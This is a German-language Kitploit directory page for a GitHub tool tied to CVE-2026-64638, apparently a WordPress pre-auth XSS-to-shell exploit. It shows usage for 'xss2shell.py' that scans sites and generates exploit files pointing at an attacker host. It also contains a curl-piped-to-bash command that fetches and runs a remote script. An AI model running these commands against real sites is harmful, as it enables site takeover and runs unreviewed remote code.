Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/horkimhab/cve-2026-64638
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & BildungLabs & Praxis
GitHubhorkimhab/cve-2026-64638

CVE-2026-64638

CVE-2026-64638 - Entwurf oder TODO

Repository anzeigen
4vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-64638

Spenden

Unterstütze die Wartung dieses Projekts über PayPal oder durch Scannen des folgenden QR-Codes.

paypal

QR-Code für Spenden

⚡ Einfache Verwendung

Verwende dieses Projekt nur in sicheren und autorisierten Umgebungen wie:

  • Lokalen virtuellen Maschinen
  • Docker-Containern
  • Isolierten Laborumgebungen
  • Autorisierten Penetrationstest-Umgebungen

Beispiel-Setup:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Beispielverwendung:

root@kitploit:~
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:

# Scan a single URL
python xss2shell.py scan http://wp-vm.local

# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt

# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json

# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local

# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/

# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator

Hinweis:

  • Wenn du von einem anderen Projekt klonst, musst du curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um das verschachtelte Verzeichnis .git zu entfernen
  • z. B.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Danksagung oder Referenzen

  • https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  • https://pwn.ai/blog/xss2shell

📚 Repository für Bildungs- und Sicherheitsforschung

Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.


⚠️ Sicherheits- und Rechtshinweis

Zweck

Dieses Repository dient ausschließlich der Bildung und autorisierten Sicherheitsforschung.

Es wurde entwickelt, um Nutzern Folgendes näherzubringen:

  • Sicherheitsschwachstellen
  • Sandbox- und Isolationskonzepte
  • Sicheres Programmieren und defensive Praktiken

Nur zur autorisierten Nutzung

Verwende dieses Repository nur in Umgebungen, in denen du die Erlaubnis hast, wie zum Beispiel:

  • Persönliche Labore oder virtuelle Maschinen
  • Docker- oder isolierte Umgebungen
  • Autorisierte Penetrationstests
  • Cybersicherheitstraining oder akademische Forschung

Unautorisierte oder illegale Nutzung ist strengstens untersagt.


Keine Haftung

Der Autor und die Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.

Durch die Nutzung dieses Repositorys stimmst du Folgendem zu:

  • Du bist für deine eigenen Handlungen verantwortlich
  • Du wirst es legal und ethisch verwenden
  • Das Projekt wird ohne Gewährleistung bereitgestellt

Ethische Nutzung

Dieses Projekt ist gedacht für:

  • Defensive Sicherheitsforschung
  • Cybersicherheitsbildung
  • Sensibilisierung für Schwachstellen
  • Forschung zu sicheren Systemen und Software

Bitte befolge Praktiken der verantwortungsvollen Offenlegung (Responsible Disclosure) und halte alle geltenden Gesetze ein.


Kontakt

Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktiere den Repository-Betreuer über GitHub.

Tool herunterladen